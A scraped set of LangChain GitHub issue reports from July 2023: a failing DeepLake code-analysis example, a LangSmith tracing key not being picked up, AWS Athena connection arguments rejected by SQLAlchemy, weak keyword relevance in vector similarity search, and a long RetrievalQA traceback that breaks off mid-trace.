root_dir = "/Users/catherineswope/chattydocs/incubator-baremaps-0.7.1-removedcomments"
docs = []
for dirpath, dirnames, filenames in os.walk(root_dir):
    for file in filenames:
        try:
            loader = TextLoader(os.path.join(dirpath, file), encoding="utf-8")
            docs.extend(loader.load_and_split())
        except Exception as e:
            pass

from langchain.text_splitter import CharacterTextSplitter

text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(docs)

username = "caswvu"  # replace with your username from app.activeloop.ai
db = DeepLake(
    dataset_path=f"hub://caswvu/baremaps",
    embedding_function=embeddings,
)
db.add_documents(texts)

db = DeepLake(
    dataset_path="hub://caswvu/baremaps",
    read_only=True,
    embedding_function=embeddings,
)
retriever = db.as_retriever()
retriever.search_kwargs["distance_metric"] = "cos"
retriever.search_kwargs["fetch_k"] = 100
retriever.search_kwargs["maximal_marginal_relevance"] = True
retriever.search_kwargs["k"] = 10

from langchain.chat_models import ChatOpenAI
from langchain.chains import ConversationalRetrievalChain

model = ChatOpenAI(model_name="gpt-3.5-turbo")  # switch to 'gpt-4'
qa = ConversationalRetrievalChain.from_llm(model, retriever=retriever)

questions = [
    "What does this code do?",
]
chat_history = []
for question in questions:
    result = qa({"question": question, "chat_history": chat_history})
    chat_history.append((question, result["answer"]))
    print(f"-> **Question**: {question} \n")
    print(f"**Answer**: {result['answer']} \n")
```
### Idea or request for content:
Can you please help me understand how to fix the code to address the error message? Also, if applicable, address in the documentation so that others can avoid as well. Thank you! | DOC: Code/twitter-the-algorithm-analysis-deeplake not working as written | https://api.github.com/repos/langchain-ai/langchain/issues/7435/comments | 8 | 2023-07-09T15:55:06Z | 2023-10-19T16:06:23Z | https://github.com/langchain-ai/langchain/issues/7435 | 1,795,458,482 | 7,435 |
[
"langchain-ai",
"langchain"
] | ### System Info
```
$ uname -a
MINGW64_NT-10.0-19045 LAPTOP-4HTFESLT 3.3.6-341.x86_64 2022-09-05 20:28 UTC x86_64 Msys
$ python --version
Python 3.10.11
$ pip show langchain
Name: langchain
Version: 0.0.228
Summary: Building applications with LLMs through composability
Home-page: https://www.github.com/hwchase17/langchain
Author:
Author-email:
License: MIT
Location: c:\users\happy\appdata\local\packages\pythonsoftwarefoundation.python.3.10_qbz5n2kfra8p0\localcache\local-packages\python310\site-packages
Requires: aiohttp, async-timeout, dataclasses-json, langchainplus-sdk, numexpr, numpy, openapi-schema-pydantic, pydantic, PyYAML, requests, SQLAlchemy, tenacity
Required-by:
```
### Who can help?
I cannot get a trace on langchain. Error:
```
File "c:\Users\happy\Documents\Projects\askjane\.venv\lib\site-packages\langchain\callbacks\manager.py", line 1702, in _configure
logger.warning(
Message: 'Unable to load requested LangChainTracer. To disable this warning, unset the LANGCHAIN_TRACING_V2 environment variables.'
Arguments: (LangChainPlusUserError('API key must be provided when using hosted LangChain+ API'),)
```
I do this check:
```
print(os.environ["LANGCHAIN-API-KEY"])
```
The correct LangChainPlus/LangSmith API key is shown; I thought this was how it was done. I do set the other OS environment variables as well.
It doesn't pick up my API key.
I apologize if I am doing something stupid, but as far as I can tell it's not working.
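One thing worth auditing (an observation, not necessarily the whole story): `LANGCHAIN-API-KEY` with hyphens is a different environment variable from `LANGCHAIN_API_KEY` with underscores, so a lookup of the underscored name comes back empty even though the hyphenated one prints fine:

```python
import os

os.environ.pop("LANGCHAIN_API_KEY", None)     # start from a clean slate
os.environ["LANGCHAIN-API-KEY"] = "sk-dummy"  # hyphenated, as in the report

print(sorted(k for k in os.environ if k.startswith("LANGCHAIN-")))
print(os.environ.get("LANGCHAIN_API_KEY"))  # → None
```

If the tracer reads the underscored name, setting only the hyphenated one would reproduce the "API key must be provided" warning.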
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
import os
os.environ["OPENAI_API_KEY"] = "..."
os.environ["LANGCHAIN-API-KEY"] = "..."
os.environ["LANGCHAIN_TRACING_V2"] = "true"
os.environ["LANGCHAIN_ENDPOINT"] = "https://api.langchain.plus"
os.environ["LANGCHAIN_PROJECT"] = "Explore Evaluating index using LLM"
print(os.environ["LANGCHAIN-API-KEY"])
from langchain import OpenAI
OpenAI().predict("Hello, world!")
```
### Expected behavior
Go to LangSmith and see the trace.
[
"langchain-ai",
"langchain"
] | ### System Info
langchain==0.0.216
langchainplus-sdk==0.0.17
python==3.10
I'm trying to connect SQLDatabaseChain to AWS Athena and getting the following error:
```
conString = f"awsathena+rest://{AWS_ACCESS_KEY_ID}:{AWS_SECRET_ACCESS_KEY}@athena.{AWS_REGION_ID}.amazonaws.com/{DATABASE}"
engine_args={
's3_staging_dir': "s3://mybuckets3/",
'work_group':'primary'
}
db = SQLDatabase.from_uri(database_uri=conString, engine_args=engine_args)
TypeError Traceback (most recent call last)
Cell In[14], line 2
1 #db = SQLDatabase.from_uri(conString)
----> 2 db = SQLDatabase.from_uri(database_uri=conString, engine_args=engine_args)
File ~\.conda\envs\generativeai\lib\site-packages\langchain\sql_database.py:124, in SQLDatabase.from_uri(cls, database_uri, engine_args, **kwargs)
122 """Construct a SQLAlchemy engine from URI."""
123 _engine_args = engine_args or {}
--> 124 return cls(create_engine(database_uri, **_engine_args), **kwargs)
File <string>:2, in create_engine(url, **kwargs)
File ~\.conda\envs\generativeai\lib\site-packages\sqlalchemy\util\deprecations.py:281, in deprecated_params.<locals>.decorate.<locals>.warned(fn, *args, **kwargs)
274 if m in kwargs:
275 _warn_with_version(
276 messages[m],
277 versions[m],
278 version_warnings[m],
279 stacklevel=3,
280 )
--> 281 return fn(*args, **kwargs)
File ~\.conda\envs\generativeai\lib\site-packages\sqlalchemy\engine\create.py:680, in create_engine(url, **kwargs)
678 # all kwargs should be consumed
679 if kwargs:
--> 680 raise TypeError(
681 "Invalid argument(s) %s sent to create_engine(), "
682 "using configuration %s/%s/%s. Please check that the "
683 "keyword arguments are appropriate for this combination "
684 "of components."
685 % (
686 ",".join("'%s'" % k for k in kwargs),
687 dialect.__class__.__name__,
688 pool.__class__.__name__,
689 engineclass.__name__,
690 )
691 )
693 engine = engineclass(pool, dialect, u, **engine_args)
695 if _initialize:
TypeError: Invalid argument(s) 's3_staging_dir','work_group' sent to create_engine(), using configuration AthenaRestDialect/QueuePool/Engine. Please check that the keyword arguments are appropriate for this combination of components.
```
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Above
### Expected behavior
Langchain connected to aws athena | SQLDatabase and SQLDatabaseChain with AWS Athena | https://api.github.com/repos/langchain-ai/langchain/issues/7430/comments | 12 | 2023-07-09T13:46:19Z | 2024-02-27T16:08:30Z | https://github.com/langchain-ai/langchain/issues/7430 | 1,795,409,409 | 7,430 |
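The traceback above comes from SQLAlchemy receiving `s3_staging_dir` and `work_group` as raw `create_engine()` keyword arguments, which it does not understand. A sketch of the usual workaround, assuming the PyAthena dialect (which reads these settings from the URI query string) is installed; the credentials and bucket below are placeholders:

```python
from urllib.parse import quote_plus

# Hypothetical values standing in for the ones in the report.
aws_access_key_id = "AKIA_PLACEHOLDER"
aws_secret_access_key = "SECRET_PLACEHOLDER"
region = "us-east-1"
database = "mydb"
s3_staging_dir = "s3://mybuckets3/"
work_group = "primary"

# PyAthena picks up s3_staging_dir/work_group from the URI query string,
# so they never reach SQLAlchemy's create_engine() as unknown kwargs.
conn_str = (
    f"awsathena+rest://{quote_plus(aws_access_key_id)}:{quote_plus(aws_secret_access_key)}"
    f"@athena.{region}.amazonaws.com:443/{database}"
    f"?s3_staging_dir={quote_plus(s3_staging_dir)}&work_group={work_group}"
)

# db = SQLDatabase.from_uri(conn_str)  # no engine_args needed
print(conn_str)
```

With the settings moved into the URI, `SQLDatabase.from_uri` can be called without `engine_args` at all.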
[
"langchain-ai",
"langchain"
] | ### System Info (M1 mac)
Python implementation: CPython
Python version : 3.11.4
IPython version : 8.14.0
Compiler : GCC 12.2.0
OS : Linux
Release : 5.15.49-linuxkit-pr
Machine : aarch64
Processor : CPU cores : 5
Architecture: 64bit
[('aiohttp', '3.8.4'), ('aiosignal', '1.3.1'), ('asttokens', '2.2.1'), ('async-timeout', '4.0.2'), ('attrs', '23.1.0'), ('backcall', '0.2.0'), ('blinker', '1.6.2'), ('certifi', '2023.5.7'), ('charset-normalizer', '3.2.0'), ('click', '8.1.4'), ('dataclasses-json', '0.5.9'), ('decorator', '5.1.1'), ('docarray', '0.35.0'), ('executing', '1.2.0'), ('faiss-cpu', '1.7.4'), ('flask', '2.3.2'), ('frozenlist', '1.3.3'), ('greenlet', '2.0.2'), ('idna', '3.4'), ('importlib-metadata', '6.8.0'), ('ipython', '8.14.0'), ('itsdangerous', '2.1.2'), ('jedi', '0.18.2'), ('jinja2', '3.1.2'), ('json5', '0.9.14'), **('langchain', '0.0.228'), ('langchainplus-sdk', '0.0.20')**, ('markdown-it-py', '3.0.0'), ('markupsafe', '2.1.3'), ('marshmallow', '3.19.0'), ('marshmallow-enum', '1.5.1'), ('matplotlib-inline', '0.1.6'), ('mdurl', '0.1.2'), ('multidict', '6.0.4'), ('mypy-extensions', '1.0.0'), ('numexpr', '2.8.4'), ('numpy', '1.25.1'), ('openai', '0.27.8'), ('openapi-schema-pydantic', '1.2.4'), ('orjson', '3.9.2'), ('packaging', '23.1'), ('parso', '0.8.3'), ('pexpect', '4.8.0'), ('pickleshare', '0.7.5'), ('pip', '23.1.2'), ('prompt-toolkit', '3.0.39'), ('psycopg2-binary', '2.9.6'), ('ptyprocess', '0.7.0'), ('pure-eval', '0.2.2'), ('pydantic', '1.10.11'), ('pygments', '2.15.1'), ('python-dotenv', '1.0.0'), ('python-json-logger', '2.0.7'), ('pyyaml', '6.0'), ('regex', '2023.6.3'), ('requests', '2.31.0'), ('rich', '13.4.2'), ('setuptools', '65.5.1'), ('six', '1.16.0'), ('slack-bolt', '1.18.0'), ('slack-sdk', '3.21.3'), ('sqlalchemy', '2.0.18'), ('stack-data', '0.6.2'), ('tenacity', '8.2.2'), ('tiktoken', '0.4.0'), ('tqdm', '4.65.0'), ('traitlets', '5.9.0'), ('types-requests', '2.31.0.1'), ('types-urllib3', '1.26.25.13'), ('typing-inspect', '0.9.0'), ('typing_extensions', '4.7.1'), ('urllib3', '2.0.3'), ('watermark', '2.4.3'), ('wcwidth', '0.2.6'), ('werkzeug', '2.3.6'), ('wheel', '0.40.0'), ('yarl', '1.9.2'), ('zipp', '3.16.0')]
### Who can help?
@hwchase17
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
```python
target_query = 'What are the hyve rules?'
facts_docs = [
Document(page_content=f)
for f in [x.strip() for x in """
Under the banner of privacy, hyve empowers you to determine the visibility of your goals, providing you with options like Public (all hyve members can see your goal), Friends (only your trusted hyve connections can), and Private (for secret missions where you can personally invite the desired ones)
At hyve, we're all about protecting your details and your privacy, making sure everything stays safe and secure
The main goal of hyve is to provide you with the tools to reach your financial goals as quickly as possible, our motto is: "Get there faster!"
Resting as the sole financial community composed entirely of 100% verified real users, hyve assures that each user is genuine and verified, enhancing the safety of you and our community
Designed with privacy as a top priority, hyve puts the power in your hands to control exactly who you share your goals with
hyve prioritizes your personal data protection and privacy rights, using your data exclusively to expedite the achievement of your goals without sharing your information with any other parties, for more info please visit https://app.letshyve.com/privacy-policy
Being the master of your privacy and investment strategies, you have full control over your goal visibility, making hyve a perfect partner for your financial journey
The Round-Up Rule in hyve integrates savings into your daily habits by rounding up your everyday expenses, depositing the surplus into your savings goal, e.g. if you purchase a cup of coffee for $2.25, hyve rounds it up to $3, directing the $0.75 difference to your savings
The Automatic Rule in hyve enables our AI engine to analyze your income and spending habits, thereby determining how much you can safely save, so you don't have to worry about it
The Recurring Rule in hyve streamlines your savings by automatically transferring a specified amount to your savings on a set schedule, making saving as effortless as possible
The Matching Rule in hyve allows you to double your savings by having another user match every dollar you save towards a goal, creating a savings buddy experience
""".strip().split('\n')]
]
retriever = FAISS.from_documents(facts_docs, OpenAIEmbeddings())
docs = '\n'.join(d.page_content for d in retriever.similarity_search(target_query, k=10))
print(docs)
for a in ['Round-Up', 'Automatic', 'Recurring', 'Matching']:
assert a in docs, f'{a} not in docs'
```
### Expected behavior
The words that carry the most information above are `hyve` and `rule`; it should return the lines which define the `Round-Up Rule in hyve`, `Automatic Rule in hyve`, `Recurring Rule in hyve`, and `Matching Rule in hyve`.
instead, the best 2 results it finds are:
> At hyve, we're all about protecting your details and your privacy, making sure everything stays safe and secure
and
> Under the banner of privacy, hyve empowers you to determine the visibility of your goals, providing you with options like Public (all hyve members can see your goal), Friends (only your trusted hyve connections can), and Private (for secret missions where you can personally invite the desired ones)
which don't even have the word `rule` in them or have anything to do with rules.
The full list of results are:
```
At hyve, we're all about protecting your details and your privacy, making sure everything stays safe and secure
Under the banner of privacy, hyve empowers you to determine the visibility of your goals, providing you with options like Public (all hyve members can see your goal), Friends (only your trusted hyve connections can), and Private (for secret missions where you can personally invite the desired ones)
The Automatic Rule in hyve enables our AI engine to analyze your income and spending habits, thereby determining how much you can safely save, so you don't have to worry about it
Designed with privacy as a top priority, hyve puts the power in your hands to control exactly who you share your goals with
The main goal of hyve is to provide you with the tools to reach your financial goals as quickly as possible, our motto is: "Get there faster!"
Resting as the sole financial community composed entirely of 100% verified real users, hyve assures that each user is genuine and verified, enhancing the safety of you and our community
hyve prioritizes your personal data protection and privacy rights, using your data exclusively to expedite the achievement of your goals without sharing your information with any other parties, for more info please visit https://app.letshyve.com/privacy-policy
The Recurring Rule in hyve streamlines your savings by automatically transferring a specified amount to your savings on a set schedule, making saving as effortless as possible
The Matching Rule in hyve allows you to double your savings by having another user match every dollar you save towards a goal, creating a savings buddy experience
Being the master of your privacy and investment strategies, you have full control over your goal visibility, making hyve a perfect partner for your financial journey
```
which don't even include the `Round-Up Rule in hyve` line in the top 10.
I've tried every open-source VectorStore I could find (FAISS, Chroma, Annoy, DocArray, Qdrant, scikit-learn, etc.); they all returned the exact same list.
I also tried making everything lowercase (it did help with other queries, here it didn't).
I also tried with relevancy score (getting 10x as many and sorting myself), which did help in other cases, but not here.
Any suggestion is welcome, especially if the error is on my side.
Thanks! | Similarity search returns random docs, not the ones that contain the specified keywords | https://api.github.com/repos/langchain-ai/langchain/issues/7427/comments | 9 | 2023-07-09T12:31:36Z | 2023-10-14T20:41:00Z | https://github.com/langchain-ai/langchain/issues/7427 | 1,795,381,432 | 7,427 |
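One mitigation worth trying (not mentioned in the report): rerank the dense-retrieval candidates with a simple lexical score so that literal keyword matches like `rule` are not drowned out by semantically broad sentences. A minimal dependency-free sketch; the scoring is a plain term-overlap heuristic with crude singularization, not any particular library's API:

```python
import re

def _terms(text: str) -> set[str]:
    # Tokenize and crudely singularize so "rules" matches "Rule".
    return {w[:-1] if w.endswith("s") else w
            for w in re.findall(r"\w+", text.lower())}

def lexical_score(query: str, doc: str) -> int:
    # Number of distinct query terms that appear in the document.
    return len(_terms(query) & _terms(doc))

def rerank(query: str, docs: list[str], top_k: int = 4) -> list[str]:
    # Stable sort: ties keep the dense-retrieval order.
    return sorted(docs, key=lambda d: -lexical_score(query, d))[:top_k]

candidates = [
    "At hyve, we're all about protecting your details and your privacy",
    "The Round-Up Rule in hyve integrates savings into your daily habits",
    "The Automatic Rule in hyve enables our AI engine to analyze your income",
]
top2 = rerank("What are the hyve rules?", candidates, top_k=2)
print(top2)
```

In practice you would fetch more candidates than needed from the vectorstore (e.g. `k=20`), rerank them lexically, and keep the top few, which is a rough stand-in for proper hybrid (dense + BM25) retrieval.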
[
"langchain-ai",
"langchain"
] | ### System Info
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
Cell In[15], line 15
12 qa = RetrievalQA(combine_documents_chain=qa_chain, retriever=retriever.as_retriever())
14 query = "halo"
---> 15 qa.run(query)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:440, in Chain.run(self, callbacks, tags, metadata, *args, **kwargs)
438 if len(args) != 1:
439 raise ValueError("`run` supports only one positional argument.")
--> 440 return self(args[0], callbacks=callbacks, tags=tags, metadata=metadata)[
441 _output_key
442 ]
444 if kwargs and not args:
445 return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[
446 _output_key
447 ]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:243, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
--> 243 raise e
244 run_manager.on_chain_end(outputs)
245 final_outputs: Dict[str, Any] = self.prep_outputs(
246 inputs, outputs, return_only_outputs
247 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:237, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
231 run_manager = callback_manager.on_chain_start(
232 dumpd(self),
233 inputs,
234 )
235 try:
236 outputs = (
--> 237 self._call(inputs, run_manager=run_manager)
238 if new_arg_supported
239 else self._call(inputs)
240 )
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/retrieval_qa/base.py:131, in BaseRetrievalQA._call(self, inputs, run_manager)
129 else:
130 docs = self._get_docs(question) # type: ignore[call-arg]
--> 131 answer = self.combine_documents_chain.run(
132 input_documents=docs, question=question, callbacks=_run_manager.get_child()
133 )
135 if self.return_source_documents:
136 return {self.output_key: answer, "source_documents": docs}
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:445, in Chain.run(self, callbacks, tags, metadata, *args, **kwargs)
440 return self(args[0], callbacks=callbacks, tags=tags, metadata=metadata)[
441 _output_key
442 ]
444 if kwargs and not args:
--> 445 return self(kwargs, callbacks=callbacks, tags=tags, metadata=metadata)[
446 _output_key
447 ]
449 if not kwargs and not args:
450 raise ValueError(
451 "`run` supported with either positional arguments or keyword arguments,"
452 " but none were provided."
453 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:243, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
--> 243 raise e
244 run_manager.on_chain_end(outputs)
245 final_outputs: Dict[str, Any] = self.prep_outputs(
246 inputs, outputs, return_only_outputs
247 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:237, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
231 run_manager = callback_manager.on_chain_start(
232 dumpd(self),
233 inputs,
234 )
235 try:
236 outputs = (
--> 237 self._call(inputs, run_manager=run_manager)
238 if new_arg_supported
239 else self._call(inputs)
240 )
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/combine_documents/base.py:106, in BaseCombineDocumentsChain._call(self, inputs, run_manager)
104 # Other keys are assumed to be needed for LLM prediction
105 other_keys = {k: v for k, v in inputs.items() if k != self.input_key}
--> 106 output, extra_return_dict = self.combine_docs(
107 docs, callbacks=_run_manager.get_child(), **other_keys
108 )
109 extra_return_dict[self.output_key] = output
110 return extra_return_dict
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/combine_documents/stuff.py:165, in StuffDocumentsChain.combine_docs(self, docs, callbacks, **kwargs)
163 inputs = self._get_inputs(docs, **kwargs)
164 # Call predict on the LLM.
--> 165 return self.llm_chain.predict(callbacks=callbacks, **inputs), {}
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/llm.py:252, in LLMChain.predict(self, callbacks, **kwargs)
237 def predict(self, callbacks: Callbacks = None, **kwargs: Any) -> str:
238 """Format prompt with kwargs and pass to LLM.
239
240 Args:
(...)
250 completion = llm.predict(adjective="funny")
251 """
--> 252 return self(kwargs, callbacks=callbacks)[self.output_key]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:243, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
--> 243 raise e
244 run_manager.on_chain_end(outputs)
245 final_outputs: Dict[str, Any] = self.prep_outputs(
246 inputs, outputs, return_only_outputs
247 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/base.py:237, in Chain.__call__(self, inputs, return_only_outputs, callbacks, tags, metadata, include_run_info)
231 run_manager = callback_manager.on_chain_start(
232 dumpd(self),
233 inputs,
234 )
235 try:
236 outputs = (
--> 237 self._call(inputs, run_manager=run_manager)
238 if new_arg_supported
239 else self._call(inputs)
240 )
241 except (KeyboardInterrupt, Exception) as e:
242 run_manager.on_chain_error(e)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/llm.py:92, in LLMChain._call(self, inputs, run_manager)
87 def _call(
88 self,
89 inputs: Dict[str, Any],
90 run_manager: Optional[CallbackManagerForChainRun] = None,
91 ) -> Dict[str, str]:
---> 92 response = self.generate([inputs], run_manager=run_manager)
93 return self.create_outputs(response)[0]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chains/llm.py:102, in LLMChain.generate(self, input_list, run_manager)
100 """Generate LLM result from inputs."""
101 prompts, stop = self.prep_prompts(input_list, run_manager=run_manager)
--> 102 return self.llm.generate_prompt(
103 prompts,
104 stop,
105 callbacks=run_manager.get_child() if run_manager else None,
106 **self.llm_kwargs,
107 )
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:230, in BaseChatModel.generate_prompt(self, prompts, stop, callbacks, **kwargs)
222 def generate_prompt(
223 self,
224 prompts: List[PromptValue],
(...)
227 **kwargs: Any,
228 ) -> LLMResult:
229 prompt_messages = [p.to_messages() for p in prompts]
--> 230 return self.generate(prompt_messages, stop=stop, callbacks=callbacks, **kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:125, in BaseChatModel.generate(self, messages, stop, callbacks, tags, metadata, **kwargs)
123 if run_managers:
124 run_managers[i].on_llm_error(e)
--> 125 raise e
126 flattened_outputs = [
127 LLMResult(generations=[res.generations], llm_output=res.llm_output)
128 for res in results
129 ]
130 llm_output = self._combine_llm_outputs([res.llm_output for res in results])
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:115, in BaseChatModel.generate(self, messages, stop, callbacks, tags, metadata, **kwargs)
112 for i, m in enumerate(messages):
113 try:
114 results.append(
--> 115 self._generate_with_cache(
116 m,
117 stop=stop,
118 run_manager=run_managers[i] if run_managers else None,
119 **kwargs,
120 )
121 )
122 except (KeyboardInterrupt, Exception) as e:
123 if run_managers:
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/base.py:262, in BaseChatModel._generate_with_cache(self, messages, stop, run_manager, **kwargs)
258 raise ValueError(
259 "Asked to cache, but no cache found at `langchain.cache`."
260 )
261 if new_arg_supported:
--> 262 return self._generate(
263 messages, stop=stop, run_manager=run_manager, **kwargs
264 )
265 else:
266 return self._generate(messages, stop=stop, **kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/openai.py:371, in ChatOpenAI._generate(self, messages, stop, run_manager, **kwargs)
363 message = _convert_dict_to_message(
364 {
365 "content": inner_completion,
(...)
368 }
369 )
370 return ChatResult(generations=[ChatGeneration(message=message)])
--> 371 response = self.completion_with_retry(messages=message_dicts, **params)
372 return self._create_chat_result(response)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/openai.py:319, in ChatOpenAI.completion_with_retry(self, **kwargs)
315 @retry_decorator
316 def _completion_with_retry(**kwargs: Any) -> Any:
317 return self.client.create(**kwargs)
--> 319 return _completion_with_retry(**kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:289, in BaseRetrying.wraps.<locals>.wrapped_f(*args, **kw)
287 @functools.wraps(f)
288 def wrapped_f(*args: t.Any, **kw: t.Any) -> t.Any:
--> 289 return self(f, *args, **kw)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:379, in Retrying.__call__(self, fn, *args, **kwargs)
377 retry_state = RetryCallState(retry_object=self, fn=fn, args=args, kwargs=kwargs)
378 while True:
--> 379 do = self.iter(retry_state=retry_state)
380 if isinstance(do, DoAttempt):
381 try:
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:314, in BaseRetrying.iter(self, retry_state)
312 is_explicit_retry = fut.failed and isinstance(fut.exception(), TryAgain)
313 if not (is_explicit_retry or self.retry(retry_state)):
--> 314 return fut.result()
316 if self.after is not None:
317 self.after(retry_state)
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/concurrent/futures/_base.py:438, in Future.result(self, timeout)
436 raise CancelledError()
437 elif self._state == FINISHED:
--> 438 return self.__get_result()
440 self._condition.wait(timeout)
442 if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
File /Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/concurrent/futures/_base.py:390, in Future.__get_result(self)
388 if self._exception:
389 try:
--> 390 raise self._exception
391 finally:
392 # Break a reference cycle with the exception in self._exception
393 self = None
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/tenacity/__init__.py:382, in Retrying.__call__(self, fn, *args, **kwargs)
380 if isinstance(do, DoAttempt):
381 try:
--> 382 result = fn(*args, **kwargs)
383 except BaseException: # noqa: B902
384 retry_state.set_exception(sys.exc_info()) # type: ignore[arg-type]
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/langchain/chat_models/openai.py:317, in ChatOpenAI.completion_with_retry.<locals>._completion_with_retry(**kwargs)
315 @retry_decorator
316 def _completion_with_retry(**kwargs: Any) -> Any:
--> 317 return self.client.create(**kwargs)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_resources/chat_completion.py:25, in ChatCompletion.create(cls, *args, **kwargs)
23 while True:
24 try:
---> 25 return super().create(*args, **kwargs)
26 except TryAgain as e:
27 if timeout is not None and time.time() > start + timeout:
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_resources/abstract/engine_api_resource.py:153, in EngineAPIResource.create(cls, api_key, api_base, api_type, request_id, api_version, organization, **params)
127 @classmethod
128 def create(
129 cls,
(...)
136 **params,
137 ):
138 (
139 deployment_id,
140 engine,
(...)
150 api_key, api_base, api_type, api_version, organization, **params
151 )
--> 153 response, _, api_key = requestor.request(
154 "post",
155 url,
156 params=params,
157 headers=headers,
158 stream=stream,
159 request_id=request_id,
160 request_timeout=request_timeout,
161 )
163 if stream:
164 # must be an iterator
165 assert not isinstance(response, OpenAIResponse)
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_requestor.py:288, in APIRequestor.request(self, method, url, params, headers, files, stream, request_id, request_timeout)
277 def request(
278 self,
279 method,
(...)
286 request_timeout: Optional[Union[float, Tuple[float, float]]] = None,
287 ) -> Tuple[Union[OpenAIResponse, Iterator[OpenAIResponse]], bool, str]:
--> 288 result = self.request_raw(
289 method.lower(),
290 url,
291 params=params,
292 supplied_headers=headers,
293 files=files,
294 stream=stream,
295 request_id=request_id,
296 request_timeout=request_timeout,
297 )
298 resp, got_stream = self._interpret_response(result, stream)
299 return resp, got_stream, self.api_key
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_requestor.py:581, in APIRequestor.request_raw(self, method, url, params, supplied_headers, files, stream, request_id, request_timeout)
569 def request_raw(
570 self,
571 method,
(...)
579 request_timeout: Optional[Union[float, Tuple[float, float]]] = None,
580 ) -> requests.Response:
--> 581 abs_url, headers, data = self._prepare_request_raw(
582 url, supplied_headers, method, params, files, request_id
583 )
585 if not hasattr(_thread_context, "session"):
586 _thread_context.session = _make_session()
File /Volumes/Samsung_T7/Augmented-FinQA/venv/lib/python3.10/site-packages/openai/api_requestor.py:553, in APIRequestor._prepare_request_raw(self, url, supplied_headers, method, params, files, request_id)
